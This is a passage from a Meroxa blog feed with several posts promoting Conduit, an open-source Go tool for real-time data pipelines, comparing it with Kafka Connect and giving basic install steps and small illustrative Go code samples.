&lt;p&gt;At &lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt;, we believe there is a better way to work with real-time data. We have created a company around helping developers reap the benefits of this real-time data world: a platform that makes the integration and use of real-time data easier for developers. &lt;a href=&quot;https://docs.meroxa.com/getting-started/configure&quot;&gt;Come give us a try.&lt;/a&gt; :)&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Why Conduit? An evolutionary leap forward for real-time data integration.]]></title><description><![CDATA[Conduit is an open-source project to make real-time data integration easier for developers and operators. ]]></description><link>https://meroxa.com/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration</link><guid isPermaLink="false">https://meroxa.com/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Thu, 10 Feb 2022 20:57:00 GMT</pubDate><content:encoded>&lt;h3&gt;Who should read this?&lt;/h3&gt;
&lt;p&gt;Developers who build and/or manage data integration systems. It will be of specific interest to those working with real-time data pipelines, Kafka Connect, and managed streaming services.&lt;/p&gt;
&lt;h3&gt;Overview&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; is an open-source project to make real-time data integration easier for developers and operators. This article is broken into roughly the “Why” and the “How” behind Conduit.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#why-another-data-project&quot;&gt;Why bother creating “yet another” data project?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#why-we-should-build-it&quot;&gt;Why should WE build it?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#how-its-different&quot;&gt;How is Conduit different than Kafka Connect?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why bother creating “yet another” data project?&lt;/h3&gt;
&lt;p&gt;We could have simply written another blog post about the many frustrations of working with Kafka Connect for data integration, but we felt it was better to be part of the solution. So, we built and &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;open-sourced a project&lt;/a&gt;: a project that we use at &lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt; and that embodies the software development principles we have learned and live by. I will get into some of those principles and the thinking behind the project in this post.&lt;/p&gt;
&lt;p&gt;The project is named &lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt;. While Conduit is not simply a Kafka Connect replacement, many of its features were informed by frustrations with Kafka Connect.&lt;/p&gt;
&lt;p&gt;Apache Kafka does a great job as the backplane, but the business value, and where most developers spend their time, is with the connectors.&lt;/p&gt;
&lt;p&gt;We believe the data connector space is in need of some rethinking and innovation. We want to make connector development better suited for developer velocity and operational best practices.&lt;/p&gt;
&lt;p&gt;We are not alone in the belief that this space is ripe for innovation. Jay Kreps (co-creator of Apache Kafka) has mentioned the innovations still needed in the connector space in his recent Keynote and in tweets like this &lt;a href=&quot;https://twitter.com/jaykreps/status/1454120042530938890&quot;&gt;one&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1242/1*6zxXGsDXwEaiUTbpKAXDYw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Why should WE build it?&lt;/h3&gt;
&lt;p&gt;We are a group of developers that have spent our careers developing software for large-scale deployments such as &lt;a href=&quot;https://www.heroku.com/managed-data-services&quot;&gt;Heroku&lt;/a&gt;. Most of the software services/platforms we have worked on in recent years have been in the context of building and managing data services such as Apache Kafka and Kafka connectors.&lt;/p&gt;
&lt;p&gt;In that time, we have learned many things about what works well and what leads to issues when developing and supporting large-scale systems. The good news is that most aspects that make a large system easier to tame also cascade down to making a small system pleasant to work with as well, while the opposite is not true.&lt;/p&gt;
&lt;p&gt;One benefit in the world of software is that developers have collectively spent a lot of time working out effective methodologies. We have aspirations like “&lt;strong&gt;Optimized for Developer Happiness&lt;/strong&gt;”. Many of those methodologies have influenced and helped us build better software at Meroxa. Such concepts as &lt;a href=&quot;https://en.wikipedia.org/wiki/Agile_software_development&quot;&gt;Agile&lt;/a&gt; and &lt;a href=&quot;https://12factor.net/&quot;&gt;12 Factor Apps&lt;/a&gt; have created certain expectations when working on projects and what a “good” project looks and feels like.&lt;/p&gt;
&lt;p&gt;With those concepts as a background context, and years of working with Kafka Connect, we decided that we needed a better way to solve data integration problems. A way that adhered to our expectations of maintainable software services. While some concepts are just baked into the project because they are baked into the Meroxa DNA, below are some worth highlighting because they directly contrast with Kafka Connect.&lt;/p&gt;
&lt;h3&gt;How is Conduit different than Kafka Connect?&lt;/h3&gt;
&lt;h3&gt;Easy local development&lt;/h3&gt;
&lt;p&gt;Kafka Connect requires a lot of setup (e.g. Apache Kafka, ZooKeeper, etc.) to get to a point of doing development or even “kicking the tires”. It is a very time-consuming development life cycle. Attempting to quickly iterate on code or test things in isolation is very frustrating or impossible. In addition to that, because of all the external dependencies, you may end up with a mismatch between your local setup and what is actually in production or another developer’s environment.&lt;/p&gt;
&lt;p&gt;Conduit addresses these issues in a few ways.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;single Go binary&lt;/a&gt; with no external dependencies. Download, run it, get going. No additional infrastructure needed.&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit#ui&quot;&gt;built-in Web UI&lt;/a&gt;. When you run the binary, you can access the Web UI and try out configurations with very little upfront knowledge, allowing you to “play” with it out of the box.&lt;/li&gt;
&lt;li&gt;SDK to simplify the connector development and testing. (Discussed later)&lt;/li&gt;
&lt;li&gt;Easy, isolated local testing and test data generation. (Discussed later)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;🗣 &lt;a href=&quot;https://github.com/ConduitIO/conduit#installation-guide&quot;&gt;Conduit installation guide&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ez6TtY28JNJoz5YBCCl_YQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;SDK to speed up development&lt;/h3&gt;
&lt;p&gt;Starting to develop connectors with Kafka Connect is confusing and complicated. It is not encouraging when, at every turn, the documentation implies that dragons are around the corner and that you should just pay to have the connectors handled for you. Can’t we just have an SDK?&lt;/p&gt;
&lt;p&gt;We are &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/37&quot;&gt;working on an SDK&lt;/a&gt; to make it easy for you. Since we work “in public”, you can keep an eye on what we are up to.&lt;/p&gt;
&lt;h3&gt;Connector development is language agnostic&lt;/h3&gt;
&lt;p&gt;Kafka connectors are very Java-centric. While you can shoehorn support for other languages into working, it is not the suggested path, and the result can be painful to maintain and poorly performant.&lt;/p&gt;
&lt;p&gt;Conduit connectors are plugins that communicate with Conduit via a gRPC interface. This means that &lt;strong&gt;plugins can be written in any language&lt;/strong&gt; as long as they conform to the standards-based interface.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.conduit.io/docs/introduction/architecture&quot;&gt;Conduit architecture diagram.&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Standard API Protocols&lt;/h3&gt;
&lt;p&gt;Conduit supports &lt;a href=&quot;https://grpc.io/docs/what-is-grpc/introduction/&quot;&gt;gRPC&lt;/a&gt; &lt;strong&gt;and REST for its management&lt;/strong&gt;, making it easy to manage with software at scale. Plugins utilize &lt;strong&gt;gRPC for data movement&lt;/strong&gt;, and soon Conduit will support the Kafka Connect API as well.&lt;/p&gt;
&lt;p&gt;We believe gRPC is the best choice for streaming data APIs. In addition to the &lt;a href=&quot;https://grpc.io/blog/principles/&quot;&gt;benefits&lt;/a&gt; of using gRPC for data movement, a large number of community members, projects, &lt;a href=&quot;https://grpc.io/docs/languages/&quot;&gt;programming languages&lt;/a&gt; and &lt;a href=&quot;https://grpc.io/docs/platforms/&quot;&gt;platforms&lt;/a&gt; supported make it a perfect choice for a data project such as Conduit.&lt;/p&gt;
&lt;p&gt;In contrast, Kafka Connect uses a custom binary protocol for data and a REST API or Java properties file for configuration. This means that client libraries have to be built and maintained as separate projects that are only useful in the Kafka ecosystem. We will also support the Kafka Connect API to allow you to migrate over existing connectors.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#api&quot;&gt;Conduit API information&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Testing&lt;/h3&gt;
&lt;p&gt;Testing a &lt;strong&gt;Kafka connector&lt;/strong&gt; &lt;strong&gt;requires a lot of infrastructure&lt;/strong&gt;, visibility is poor, errors are often misleading, and generating test data is a pain. Instead of iterating on your code, you feel like you are testing a whole collection of infrastructure you have cobbled together, which may not look like production anyway. So, what were you really testing?&lt;/p&gt;
&lt;p&gt;Testing with Conduit is different: since the connector and its &lt;strong&gt;dependencies are decoupled&lt;/strong&gt;, you can test your changes in &lt;a href=&quot;https://12factor.net/dependencies&quot;&gt;isolation&lt;/a&gt; from the environment. We have created a &lt;a href=&quot;https://github.com/ConduitIO/conduit/tree/main/pkg/plugins/generator&quot;&gt;test data generator&lt;/a&gt; and data validator to save you from wasting time creating test data to verify your connector is working.&lt;/p&gt;
&lt;h3&gt;Free and Open&lt;/h3&gt;
&lt;p&gt;Many Kafka connectors cannot be used by us at all. The limitations of the licenses create situations where you are either &lt;strong&gt;locked into the Confluent platform&lt;/strong&gt; to continue use, or you may be compliant today but, as your business grows and evolves, unknowingly move into a violation. Many developers experienced the pain of the &lt;a href=&quot;https://www.confluent.io/confluent-community-license-faq/&quot;&gt;license shift&lt;/a&gt; that Confluent made a few years ago. It sucks to find yourself in that situation. We don’t want that to happen to you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit is free to use and open source&lt;/strong&gt;. The &lt;strong&gt;license is permissive&lt;/strong&gt; and encourages developers to utilize it and get value from it in their projects. We are strong believers in the value of standards and open source, and we believe we should not be creating situations for lock-in or crippling projects and use cases.&lt;/p&gt;
&lt;h3&gt;Monitoring&lt;/h3&gt;
&lt;p&gt;Kafka Connect uses &lt;strong&gt;JMX for metrics&lt;/strong&gt;. We found this to be cumbersome to work with and required additional setup to get metrics into our metrics platform.&lt;/p&gt;
&lt;p&gt;Conduit supports sending metrics to &lt;a href=&quot;https://prometheus.io/&quot;&gt;&lt;strong&gt;Prometheus&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;right out of the box&lt;/strong&gt;. Prometheus is our preferred metrics platform, as well as that of most of the developers we have heard from.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/metrics.md&quot;&gt;Conduit metrics exposed&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Go vs Java&lt;/h3&gt;
&lt;p&gt;Kafka Connect is built with Java. For our use case, building a multi-tenant platform that leverages Kafka Connect wasn’t economical. Each provisioned connector took up a ton of memory, sometimes in excess of 1 GB. If usage isn’t consistent, you end up with a bunch of provisioned resources that see very little utilization.&lt;/p&gt;
&lt;p&gt;Go uses very few resources, compiles to a small deployable binary, has fast startup/shutdown times, is stable and performant, and has a &lt;a href=&quot;https://go.dev/solutions/#case-studies&quot;&gt;large community of projects&lt;/a&gt; and support.&lt;/p&gt;
&lt;p&gt;Conduit leverages goroutines that are connected using Go channels. A goroutine can take up as little as 2 kB of memory. Goroutines run concurrently and independently, making multiple processes very efficient on multi-core machines. Unlike Java threads, which consume large amounts of memory, goroutines require much less RAM, lowering the risk of crashing due to lack of memory.&lt;/p&gt;
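&lt;p&gt;As a rough illustration of the pattern (a hypothetical toy example, not Conduit code), here is work fanned out to one goroutine per input and collected over a shared channel:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"sync"
)

// fanIn starts one goroutine per input value and collects the results
// over a shared channel. Each goroutine starts with only a few
// kilobytes of stack, so spawning many of them is cheap.
func fanIn(inputs []int) int {
	out := make(chan int)
	var wg sync.WaitGroup
	for _, v := range inputs {
		wg.Add(1)
		go func(n int) {
			defer wg.Done()
			out <- n * n // each goroutine does its piece of work
		}(v)
	}
	// close the channel once every worker has finished
	go func() {
		wg.Wait()
		close(out)
	}()
	sum := 0
	for v := range out {
		sum += v
	}
	return sum
}

func main() {
	fmt.Println(fanIn([]int{1, 2, 3})) // 1 + 4 + 9 = 14
}
```

&lt;p&gt;The workers run concurrently, yet the result is deterministic because the channel collects every value before the sum is returned.&lt;/p&gt;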
&lt;p&gt;The small binary size and resource usage provide a variety of benefits. At the large end of the scale, say, if you are building a managed service like us, small memory use, faster boot times, minimal dependencies, small file size, etc., translate into actual dollars saved on resources as well as a better user experience. At the small end of the scale, it means you can deploy to even a Raspberry Pi, or to places we have not yet considered. And even for just local development, it means getting up, running, and productive quickly.&lt;/p&gt;
&lt;p&gt;There are good reasons Go has become the language of choice for infrastructure and operations services such as Kubernetes, Terraform, and Docker. Conduit is built to fit well into that ecosystem, which means better integration and support going forward. The value of a strong community is hard to overstate.&lt;/p&gt;
&lt;h3&gt;Easy Transformations&lt;/h3&gt;
&lt;p&gt;Kafka Connect requires you to write &lt;strong&gt;transformations in Java&lt;/strong&gt; and to implement a pile of files and functions via a confusing process with little help. It is more complicated than it needs to be. Transformations are widely needed in data pipelines, even by people who don’t build connectors. Transformations should be approachable and easy.&lt;/p&gt;
&lt;p&gt;In Conduit, &lt;strong&gt;transformations are written in JavaScript&lt;/strong&gt;. JavaScript is one of the most widely known programming languages. Most developers already know JavaScript, even if they primarily use another language.&lt;/p&gt;
&lt;h3&gt;Pipeline Centric&lt;/h3&gt;
&lt;p&gt;Kafka Connect is connector-centric, which pushes data transformations into the background and ties them to specific connectors. This is problematic because we want to build pipelines, not just connectors. The goal is easy pipelines for real-time data. When you think in terms of pipelines, you also make different choices for things like transformations. For example, in the Kafka Connect world, a transformation only sits between the source and destination.&lt;/p&gt;
&lt;p&gt;Conduit decouples where a transformation sits, allowing you to transform data coming from a source and/or going into a destination. That means your pipeline can treat how data enters it and how data leaves it as different operations.&lt;/p&gt;
&lt;p&gt;Conduit considers pipelines the primary goal and the &lt;a href=&quot;https://www.conduit.io/docs/introduction/architecture&quot;&gt;architecture&lt;/a&gt; reflects that.&lt;/p&gt;
&lt;h3&gt;Ready to get started with Conduit?&lt;/h3&gt;
&lt;p&gt;To stay up to date with what we are working on, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;GitHub Project board&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Review the documentation at the main &lt;a href=&quot;https://www.conduit.io/&quot;&gt;website&lt;/a&gt; as well as the &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;GitHub repo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Find out &lt;a href=&quot;https://github.com/ConduitIO/conduit#contributing&quot;&gt;how to contribute&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Install Conduit by following the &lt;a href=&quot;https://github.com/ConduitIO/conduit#installation-guide&quot;&gt;installation guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Easily migrate from Kafka Connect&lt;/h3&gt;
&lt;p&gt;Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;will support&lt;/a&gt; the Kafka Connect API. This will allow you to bring your existing connectors.&lt;/p&gt;
&lt;h3&gt;Do you have feedback?&lt;/h3&gt;
&lt;p&gt;What are your struggles with data integration?&lt;/p&gt;
&lt;p&gt;What are we missing?&lt;/p&gt;
&lt;p&gt;What would you add to the requirements list?&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Where is the modern data stack for software engineers?]]></title><description><![CDATA[The Future of the Modern Data Stack looks excellent for data engineers. But where is the modern data stack for software engineers?]]></description><link>https://meroxa.com/blog/where-is-the-modern-data-stack-for-software-engineers</link><guid isPermaLink="false">https://meroxa.com/blog/where-is-the-modern-data-stack-for-software-engineers</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 04 Feb 2022 20:34:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://blog.getdbt.com/future-of-the-modern-data-stack/&quot;&gt;The Future of the Modern Data Stack&lt;/a&gt; looks excellent for data engineers. However, as a software engineer, I kind of feel left out. Where is the modern data stack for software engineers?&lt;/p&gt;
&lt;p&gt;Marketing teams and data engineers need data to answer questions; software engineers need data to build features. This difference is why you’ll find that tools like &lt;a href=&quot;http://segment.com/&quot;&gt;Segment&lt;/a&gt; don’t have connections for tools like Elasticsearch (a search engine) or Redis (a cache).&lt;/p&gt;
&lt;p&gt;A business may use the modern data stack to ask better questions about what’s happening in its business, applications, and so on. A modern data stack is critical today if you want to succeed, and this world is fast filling with an abundance of new SaaS data products and tools.&lt;/p&gt;
&lt;p&gt;Here, I’d like to present a slightly different data problem for a different data audience: software engineers.&lt;/p&gt;
&lt;p&gt;Software engineers leverage data infrastructure in a very different way. The tools aren’t Google Analytics and &lt;a href=&quot;https://clearbit.com/&quot;&gt;Clearbit&lt;/a&gt;, but &lt;a href=&quot;https://upstash.com/&quot;&gt;Upstash&lt;/a&gt; and &lt;a href=&quot;https://supabase.com/&quot;&gt;Supabase&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Engineers need to move data back and forth to build features and infrastructure that adds customer value.&lt;/p&gt;
&lt;p&gt;Where are my tools to help me use &lt;strong&gt;code&lt;/strong&gt; to move, process, or manipulate data across my application infrastructure? Today, I see a lot of one-off scripts, custom microservices, or tools that require me to scale a JVM.&lt;/p&gt;
&lt;h3&gt;The Data Integration Problem&lt;/h3&gt;
&lt;p&gt;I want to tell you about a problem that every software engineer experiences: the data integration problem.&lt;/p&gt;
&lt;p&gt;With infrastructure becoming easier to acquire, and amazing tools like &lt;a href=&quot;https://www.heroku.com/&quot;&gt;Heroku&lt;/a&gt;, &lt;a href=&quot;https://render.com/&quot;&gt;Render&lt;/a&gt;, &lt;a href=&quot;http://planetscale.com/&quot;&gt;PlanetScale&lt;/a&gt;, &lt;a href=&quot;https://upstash.com/&quot;&gt;Upstash&lt;/a&gt;, and &lt;a href=&quot;https://supabase.com/&quot;&gt;Supabase&lt;/a&gt;, it’s getting easier every day to spin up new data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;data infrastructure — a new system that generates or stores data.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Keep this definition in mind; it’s crucial.&lt;/p&gt;
&lt;p&gt;In general, writing software is becoming more &lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; every day. Engineers commonly pull data from all sorts of places from within (or without) our infrastructure to build applications that are &lt;a href=&quot;https://www.amazon.com/Designing-Data-Intensive-Applications-Reliable-Maintainable/dp/1449373321&quot;&gt;data-intensive&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Data-intensive applications are complex and made up of many systems like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;multiple microservices&lt;/li&gt;
&lt;li&gt;caches&lt;/li&gt;
&lt;li&gt;databases&lt;/li&gt;
&lt;li&gt;event brokers&lt;/li&gt;
&lt;li&gt;data warehouse&lt;/li&gt;
&lt;li&gt;search engines&lt;/li&gt;
&lt;li&gt;log aggregation systems&lt;/li&gt;
&lt;li&gt;CRM&lt;/li&gt;
&lt;li&gt;analytics platforms&lt;/li&gt;
&lt;li&gt;… and third-party tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our software systems contain many specialized tools that accelerate development and growth. These additional tools and platforms solve real problems and help teams move fast. But, there is one catch.&lt;/p&gt;
&lt;p&gt;If you zoom out a bit, we are slowly acquiring more and more specialized data infrastructure. A distributed data infrastructure means that our systems generate and consume data from &lt;em&gt;more and more&lt;/em&gt; data stores.&lt;/p&gt;
&lt;p&gt;If not appropriately managed, the number of “data tasks” will continue to increase. This means we will spend less and less time building features and more and more time integrating data.&lt;/p&gt;
&lt;p&gt;I’m not sure this is what we want.&lt;/p&gt;
&lt;p&gt;I keep asking myself: Is spending tons of time moving data around a valuable activity for software engineers?&lt;/p&gt;
&lt;p&gt;Today, there are production tools that software engineers may use to solve this problem, like Apache Kafka and Airflow. But deploying and managing these systems isn’t the greatest experience, and it requires people on your team whose only job is to manage them.&lt;/p&gt;
&lt;p&gt;I’d argue that “easy data movement for developers” is still a super unsolved problem.&lt;/p&gt;
&lt;h3&gt;The data-centric developer mindset&lt;/h3&gt;
&lt;p&gt;I’m not sure this is even a problem that will go away. We will continue to use specialized tools that accelerate development and growth. In most cases:&lt;/p&gt;
&lt;p&gt;ElasticSearch will always offer a better developer experience for searching than MySQL.&lt;/p&gt;
&lt;p&gt;Snowflake will always offer a better developer experience for data warehousing than PostgreSQL.&lt;/p&gt;
&lt;p&gt;There will be no magic data store 🪄. We will forever be in a data ecosystem that won’t consolidate much, because data infrastructure will always involve design decisions that are good for one use case and possibly poor for others.&lt;/p&gt;
&lt;p&gt;With that being said, the &lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; mindset is becoming more common when building software.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*NxGu1WiC1WqTUPL8&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;With data at the forefront of system design, engineers who used to ask themselves, “What database will I use for this application?” will now be asking themselves, “How will this new application integrate with my data infrastructure?”&lt;/p&gt;
&lt;p&gt;The next generation of applications will be built with a data-first mindset.&lt;/p&gt;
&lt;h3&gt;What is the data integration problem?&lt;/h3&gt;
&lt;p&gt;Now, we can look at this problem from a data-centric mindset. Data integration problems are tasks that take the following form:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data in system A needs to get to system B.&lt;/li&gt;
&lt;li&gt;Data changes in A need to be continuously replicated into B.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can map a vast landscape of problems to these. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Log Aggregation&lt;/li&gt;
&lt;li&gt;Syncing data from PostgreSQL to Redis for caching.&lt;/li&gt;
&lt;li&gt;Listening to changes from a PostgreSQL table and writing them to a data warehouse.&lt;/li&gt;
&lt;li&gt;Watching a file for changes and writing the changes to a database.&lt;/li&gt;
&lt;li&gt;Consuming data from a Kafka topic and writing it somewhere else.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you squint and tilt your head to the side, you’ll notice that all of these problems involve moving data from one place to another. These problems aren’t specific to any particular industry; they apply to software engineering as a whole.&lt;/p&gt;
&lt;p&gt;Some problems, such as the need for data warehousing, you’d only hit as you scale; others, like streaming data from a log, are ubiquitous among software engineers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We always code first, think later.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;These problems all move data from one place to another, yet we typically reach for a different tool, or build a custom one, each time. Moving data from one place to another looks simple on the surface, mainly because it’s super convenient to write a small service that does the one data task you need.&lt;/p&gt;
&lt;p&gt;But, most will eventually find that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Datastores and schemas improve, change and update over time.&lt;/li&gt;
&lt;li&gt;Managing real-time syncing between data infrastructure is 🥲.&lt;/li&gt;
&lt;li&gt;Relying on external data infrastructure (SaaS tools, external APIs) is fragile.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Then, some may discover &lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;The Log&lt;/a&gt; and adopt Kafka. Kafka is an &lt;em&gt;outstanding&lt;/em&gt; event-streaming broker. But it’s a massive addition to your infrastructure just to move data from one place to another.&lt;/p&gt;
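&lt;p&gt;Stripped to its essence, the recurring task described above (apply unseen changes from system A to system B) can be sketched as a toy example, with Go maps standing in for real data stores:&lt;/p&gt;

```go
package main

import "fmt"

// record is a hypothetical change-log entry: a key, its new value,
// and a monotonically increasing version number.
type record struct {
	key, value string
	version    int
}

// replicate applies any changes newer than lastSeen to dst and
// returns the new cursor, mimicking how a sync job keeps system B
// continuously caught up with system A's change log.
func replicate(changes []record, dst map[string]string, lastSeen int) int {
	for _, c := range changes {
		if c.version > lastSeen { // only apply changes we haven't seen yet
			dst[c.key] = c.value
			lastSeen = c.version
		}
	}
	return lastSeen
}

func main() {
	dst := map[string]string{}
	log := []record{{"user:1", "ada", 1}, {"user:1", "grace", 2}}
	cursor := replicate(log, dst, 0)
	fmt.Println(dst["user:1"], cursor) // grace 2
}
```

&lt;p&gt;Every bullet in the list above is some variation of this loop; the hard parts are the cursor management, schema changes, and failure handling around it.&lt;/p&gt;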
&lt;h3&gt;What Now?&lt;/h3&gt;
&lt;p&gt;This is why we are working on a project called &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; at Meroxa. We hope to change the experience software engineers have with data.&lt;/p&gt;
&lt;p&gt;At a high level, Conduit is a data streaming tool written in Go. It aims to provide the best software developer experience for building and running real-time data pipelines.&lt;/p&gt;
&lt;p&gt;I’d love to know what you think, and I’d love to see more data tools for software engineers.&lt;/p&gt;
&lt;p&gt;Thank you for reading. Have a beautiful day ☀️&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit: Streaming Data Integration for Developers]]></title><description><![CDATA[We’re open-sourcing Conduit, Meroxa’s data integration tool built to be flexible & extendible, and provide developer-friendly streaming data orchestration.]]></description><link>https://meroxa.com/blog/conduit-streaming-data-integration-for-developers</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-streaming-data-integration-for-developers</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 21 Jan 2022 20:38:00 GMT</pubDate><content:encoded>&lt;p&gt;Let’s be honest, spending tons of time moving data around is not a fun or valuable activity for software engineers. Most of the tooling to solve this problem primarily targets data analysts or data engineers, not software engineers.&lt;/p&gt;
&lt;p&gt;Today, the tooling for software engineers is incredibly complex and challenging to operate. For example, we have to install distributed systems with multiple dependencies, which also happen to be distributed systems 🙃 .&lt;/p&gt;
&lt;p&gt;Moving data between data infrastructures should be much easier and free.
Today, we’re happy to announce that we’re open-sourcing Conduit, Meroxa’s data integration tool, built to be flexible and extensible and to provide developer-friendly streaming data orchestration.&lt;/p&gt;
&lt;p&gt;Writing software is becoming more &lt;a href=&quot;http://www.datacentricmanifesto.org/&quot;&gt;data-centric&lt;/a&gt; every day. Software engineers now commonly pull data from all sorts of places within (or outside) their infrastructure to provide data-driven features to their users.&lt;/p&gt;
&lt;p&gt;Let’s make that easier.&lt;/p&gt;
&lt;h3&gt;Getting Started with Conduit&lt;/h3&gt;
&lt;p&gt;To get started with Conduit, you can head over to our &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.1.0&quot;&gt;GitHub releases page&lt;/a&gt; and:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Download Conduit Binary&lt;/li&gt;
&lt;li&gt;Unzip&lt;/li&gt;
&lt;li&gt;Build Pipelines 🚀&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you’re on Mac, it will look something like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;tar&lt;/span&gt; zxvf conduit_0.1.0_Darwin_x86_64.tar.gz&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, right from the start, you’ll be able to open your web browser and navigate to &lt;code class=&quot;language-text&quot;&gt;http://localhost:8080/ui/&lt;/code&gt; to start building pipelines.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ABZKgHs1CMgYsVv_fy6-jg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit ships with a UI for local development. Then, once you get data moving, there is much more for you to explore.&lt;/p&gt;
&lt;h3&gt;Why We Made Conduit&lt;/h3&gt;
&lt;p&gt;At Meroxa, our vision is to enable developers to build streaming data applications without worrying about deploying and monitoring complex distributed infrastructure like Apache Kafka and Kafka Connect.&lt;/p&gt;
&lt;p&gt;But, to make those applications possible, you’ve got to be able to move data between nodes in a directed acyclic graph (DAG) with minimal latency, using as few resources as possible.&lt;/p&gt;
&lt;p&gt;Not only that, we needed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Easy deployment:&lt;/strong&gt; With a large number of customers moving data within Meroxa’s infrastructure, any efficiencies start to compound, especially when running a managed service. (cough...cough JVM)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Allow for DevOps and Monitoring best practices:&lt;/strong&gt; We wanted to ship metrics straight to Prometheus without dealing with intermediate agents. In the Java world, we would have had to use JMX, which comes with its own set of dependencies and potential failures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;An excellent connector developer experience:&lt;/strong&gt; Developing connectors should be consistent, straightforward, and familiar in modern languages.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A User Interface:&lt;/strong&gt; We wanted a baked-in user interface to aid local development. This also makes getting started super easy.&lt;/li&gt;
